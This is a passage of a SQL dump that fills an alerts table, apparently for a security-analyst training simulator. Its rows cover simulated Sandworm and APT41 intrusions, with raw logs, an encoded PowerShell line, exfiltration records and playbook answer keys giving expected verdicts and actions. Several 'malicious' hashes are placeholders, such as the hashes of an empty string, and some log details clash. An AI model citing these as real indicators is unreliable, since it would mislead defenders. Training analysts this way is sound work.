'{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.10.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address associated with the compromised server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.143.223.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"External IP address associated with known Sandworm operations.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Olympic Destroyer malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_script.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"suspicious\",\"details\":\"Script file executed on the server, related to the malicious 
activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(527, 'Persistence Mechanism Activated: Backdoors Installed', 'high', 'System Logs', 'The threat actors associated with the Sandworm group have successfully installed backdoors on multiple systems within the network. This action is part of their persistence strategy to maintain access even if initial access vectors are mitigated. The logs indicate suspicious activity from an external IP address linked with known malicious activity.', 'Persistence', 'T1059: Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":4625,\"source_ip\":\"185.92.220.33\",\"username\":\"compromised_user\",\"command_executed\":\"powershell -encodedCommand UwBlAHIAdgBpAGMAZQAgAHMAdABhAHIAdAAgAC0AcABhAHIAcwBlAFMAdABhAHIAdAAgAE0AdQBsAHQAaQBzAHQAYQByAHQAZQByACAALQBhAHQAdAByACAAIgBIAEEAVABjAGgAIgA=\",\"file_created\":\"C:\\\\Windows\\\\System32\\\\backdoor.exe\",\"file_hash\":\"2c1743a391305fbf367df8e4f069f9f9\",\"internal_ip\":\"192.168.1.15\"}', '2026-01-06 01:44:46', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.33\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous Sandworm group activities\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"User account observed in unusual activity\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"2c1743a391305fbf367df8e4f069f9f9\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known backdoor executable\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Logs\",\"verdict\":\"internal\",\"details\":\"Internal host showing signs of 
compromise\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.145Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":4625,\\\"source_ip\\\":\\\"185.92.220.33\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"command_executed\\\":\\\"powershell -encodedCommand UwBlAHIAdgBpAGMAZQAgAHMAdABhAHIAdAAgAC0AcABhAHIAcwBlAFMAdABhAHIAdAAgAE0AdQBsAHQAaQBzAHQAYQByAHQAZQByACAALQBhAHQAdAByACAAIgBIAEEAVABjAGgAIgA=\\\",\\\"file_created\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"2c1743a391305fbf367df8e4f069f9f9\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.145Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":4625,\\\"source_ip\\\":\\\"185.92.220.33\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"command_executed\\\":\\\"powershell -encodedCommand UwBlAHIAdgBpAGMAZQAgAHMAdABhAHIAdAAgAC0AcABhAHIAcwBlAFMAdABhAHIAdAAgAE0AdQBsAHQAaQBzAHQAYQByAHQAZQByACAALQBhAHQAdAByACAAIgBIAEEAVABjAGgAIgA=\\\",\\\"file_created\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"2c1743a391305fbf367df8e4f069f9f9\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.145Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated 
event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":4625,\\\"source_ip\\\":\\\"185.92.220.33\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"command_executed\\\":\\\"powershell -encodedCommand UwBlAHIAdgBpAGMAZQAgAHMAdABhAHIAdAAgAC0AcABhAHIAcwBlAFMAdABhAHIAdAAgAE0AdQBsAHQAaQBzAHQAYQByAHQAZQByACAALQBhAHQAdAByACAAIgBIAEEAVABjAGgAIgA=\\\",\\\"file_created\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"2c1743a391305fbf367df8e4f069f9f9\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.145Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":4625,\\\"source_ip\\\":\\\"185.92.220.33\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"command_executed\\\":\\\"powershell -encodedCommand UwBlAHIAdgBpAGMAZQAgAHMAdABhAHIAdAAgAC0AcABhAHIAcwBlAFMAdABhAHIAdAAgAE0AdQBsAHQAaQBzAHQAYQByAHQAZQByACAALQBhAHQAdAByACAAIgBIAEEAVABjAGgAIgA=\\\",\\\"file_created\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"2c1743a391305fbf367df8e4f069f9f9\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.145Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":4625,\\\"source_ip\\\":\\\"185.92.220.33\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"command_executed\\\":\\\"powershell -encodedCommand 
UwBlAHIAdgBpAGMAZQAgAHMAdABhAHIAdAAgAC0AcABhAHIAcwBlAFMAdABhAHIAdAAgAE0AdQBsAHQAaQBzAHQAYQByAHQAZQByACAALQBhAHQAdAByACAAIgBIAEEAVABjAGgAIgA=\\\",\\\"file_created\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"2c1743a391305fbf367df8e4f069f9f9\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(528, 'Lateral Movement: Spreading Through Critical Systems', 'high', 'Internal Network Monitoring', 'The threat actor is engaging in lateral movement within the network, targeting critical systems essential for the ceremony\'s operation. The objective is to identify and disrupt key systems, potentially using malware associated with known destructive campaigns.', 'Lateral Movement', 'T1550: Use Alternate Authentication Material', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:11Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.1.10.25\",\"dst_ip\":\"192.168.1.100\",\"src_port\":445,\"dst_port\":135,\"protocol\":\"SMB\",\"username\":\"ceremony_admin\",\"file_accessed\":\"Olympic_Destroyer.exe\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"external_malicious_ip\":\"203.0.113.45\"}', '2026-01-06 01:44:46', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.10.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_asset_db\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_asset_db\",\"verdict\":\"internal\",\"details\":\"Critical internal server.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"Olympic_Destroyer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_service\",\"verdict\":\"malicious\",\"details\":\"Known malware associated with Olympic Destroyer campaign.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Olympic Destroyer 
malware.\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_service\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Sandworm activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(529, 'Data Exfiltration: Sensitive Information Targeted', 'high', 'Data Loss Prevention (DLP)', 'In a final move, data is exfiltrated, possibly containing sensitive information that can be leveraged in future operations or sold on the black market. The threat actor utilized a compromised internal server to transmit sensitive documents to an external IP address.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:08Z\",\"internal_source_ip\":\"192.168.45.22\",\"external_destination_ip\":\"203.0.113.57\",\"user\":\"jdoe\",\"exfiltrated_files\":[\"confidential_report.pdf\",\"financial_summary.xlsx\"],\"malware_hash\":\"4a8a08f09d37b73795649038408b5f33\",\"protocol\":\"HTTPS\",\"destination_port\":443,\"alert_id\":\"DLP-EXFIL-20231015-001\",\"detected_by\":\"Company DLP System\",\"associated_campaign\":\"Olympic Destroyer\"}', '2026-01-06 01:44:46', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.57\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known exfiltration attempts by Sandworm APT\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.45.22\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Compromised internal server used for data exfiltration\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"4a8a08f09d37b73795649038408b5f33\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Malware hash associated with Sandworm campaigns\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_report.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"Data Loss Prevention Logs\",\"verdict\":\"suspicious\",\"details\":\"File flagged during exfiltration 
attempt\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.147Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:08Z\\\",\\\"internal_source_ip\\\":\\\"192.168.45.22\\\",\\\"external_destination_ip\\\":\\\"203.0.113.57\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[\\\"confidential_report.pdf\\\",\\\"financial_summary.xlsx\\\"],\\\"malware_hash\\\":\\\"4a8a08f09d37b73795649038408b5f33\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_port\\\":443,\\\"alert_id\\\":\\\"DLP-EXFIL-20231015-001\\\",\\\"detected_by\\\":\\\"Company DLP System\\\",\\\"associated_campaign\\\":\\\"Olympic Destroyer\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.147Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:08Z\\\",\\\"internal_source_ip\\\":\\\"192.168.45.22\\\",\\\"external_destination_ip\\\":\\\"203.0.113.57\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[\\\"confidential_report.pdf\\\",\\\"financial_summary.xlsx\\\"],\\\"malware_hash\\\":\\\"4a8a08f09d37b73795649038408b5f33\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_port\\\":443,\\\"alert_id\\\":\\\"DLP-EXFIL-20231015-001\\\",\\\"detected_by\\\":\\\"Company DLP System\\\",\\\"associated_campaign\\\":\\\"Olympic Destroyer\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.147Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event 
count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:08Z\\\",\\\"internal_source_ip\\\":\\\"192.168.45.22\\\",\\\"external_destination_ip\\\":\\\"203.0.113.57\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[\\\"confidential_report.pdf\\\",\\\"financial_summary.xlsx\\\"],\\\"malware_hash\\\":\\\"4a8a08f09d37b73795649038408b5f33\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_port\\\":443,\\\"alert_id\\\":\\\"DLP-EXFIL-20231015-001\\\",\\\"detected_by\\\":\\\"Company DLP System\\\",\\\"associated_campaign\\\":\\\"Olympic Destroyer\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.147Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:08Z\\\",\\\"internal_source_ip\\\":\\\"192.168.45.22\\\",\\\"external_destination_ip\\\":\\\"203.0.113.57\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[\\\"confidential_report.pdf\\\",\\\"financial_summary.xlsx\\\"],\\\"malware_hash\\\":\\\"4a8a08f09d37b73795649038408b5f33\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_port\\\":443,\\\"alert_id\\\":\\\"DLP-EXFIL-20231015-001\\\",\\\"detected_by\\\":\\\"Company DLP System\\\",\\\"associated_campaign\\\":\\\"Olympic Destroyer\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.147Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:08Z\\\",\\\"internal_source_ip\\\":\\\"192.168.45.22\\\",\\\"external_destination_ip\\\":\\\"203.0.113.57\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[\\\"confidential_report.pdf\\\",\\\"financial_summary.xlsx\\\"],\\\"malware_hash\\\":\\\"4a8a08f09d37b73795649038408b5f33\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_port\\\":443,\\\"alert_id\\\":\\\"DLP-EXFIL-20231015-001\\\",\\\"detected_by\\\":\\\"Company DLP System\\\",\\\"associated_campaign\\\":\\\"Olympic Destroyer\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(530, 'Initial Access: ASUS Update Utility Compromised', 'critical', 'Network Traffic Analysis', 'APT41 has compromised the ASUS Live Update utility, enabling malware distribution via a supply chain attack. This can potentially allow the threat actor to infiltrate systems that use the ASUS update service.', 'Supply Chain Attack', 'T1195.002', 1, 'Closed', 68, '{\"timestamp\":\"2023-10-25T14:23:05Z\",\"event_type\":\"network_connection\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.5\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"file_name\":\"ASUSUpdate.exe\",\"file_hash\":\"3a2f4e6d2b2a4f5c6f9e8b7e4c1d2f3e\",\"user\":\"jsmith\",\"action\":\"connection_attempt\",\"status\":\"success\",\"direction\":\"outbound\"}', '2026-01-06 02:36:36', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Source IP is from an internal network range.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_feeds\",\"verdict\":\"malicious\",\"details\":\"Destination IP is associated with APT41 activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3a2f4e6d2b2a4f5c6f9e8b7e4c1d2f3e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"File hash corresponds to a known variant of malware used in ASUS supply chain attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ASUSUpdate.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"vendor_security_advisory\",\"verdict\":\"suspicious\",\"details\":\"File name is associated with the compromised ASUS update utility.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(531, 'Execution: Malicious Payload Deployment', 'high', 'Endpoint Detection and Response', 'The infected update utility executes the malicious payload on target machines, setting the stage for further exploitation.', 'Malware Execution', 'T1059: Command and Scripting Interpreter', 1, 'Closed', 68, '{\"timestamp\":\"2023-10-05T14:22:39Z\",\"event_id\":\"E123456\",\"source_ip\":\"203.0.113.15\",\"internal_ip\":\"192.168.1.45\",\"user\":\"jdoe\",\"process_name\":\"update.exe\",\"file_path\":\"C:\\\\Program Files\\\\Update\\\\update.exe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"action\":\"execute\",\"description\":\"Malicious payload executed by compromised update utility.\",\"os\":\"Windows 10\",\"username\":\"jdoe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-06 02:36:36', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known to be associated with APT41 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Associated with malware used in APT41 operations.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"clean\",\"details\":\"User account of the compromised system.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(532, 'Persistence: Establishing Backdoor Access', 'high', 'System Logs', 'APT41 has successfully installed a backdoor on the targeted system to ensure continued access. The backdoor was detected through analysis of system logs, indicating a connection to a known malicious IP and the presence of a suspicious executable file in the system.', 'Backdoor Installation', 'T1078 - Valid Accounts', 1, 'Closed', 68, '{\"timestamp\":\"2023-10-11T15:23:45Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"username\":\"compromised_user\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\backdoor.exe\",\"process_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"Execution\",\"status\":\"Failed Logon\",\"logon_type\":\"3\",\"authentication_package\":\"NTLM\",\"network_address\":\"10.0.0.55\",\"logon_guid\":\"{12345678-1234-5678-1234-567812345678}\"}', '2026-01-06 02:36:36', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT41 associated IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Inventory\",\"verdict\":\"internal\",\"details\":\"Corporate workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"suspicious\",\"details\":\"Account used in multiple logon attempts.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash associated with backdoor 
executable.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.123Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T15:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"process_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Execution\\\",\\\"status\\\":\\\"Failed Logon\\\",\\\"logon_type\\\":\\\"3\\\",\\\"authentication_package\\\":\\\"NTLM\\\",\\\"network_address\\\":\\\"10.0.0.55\\\",\\\"logon_guid\\\":\\\"{12345678-1234-5678-1234-567812345678}\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.123Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T15:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"process_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Execution\\\",\\\"status\\\":\\\"Failed 
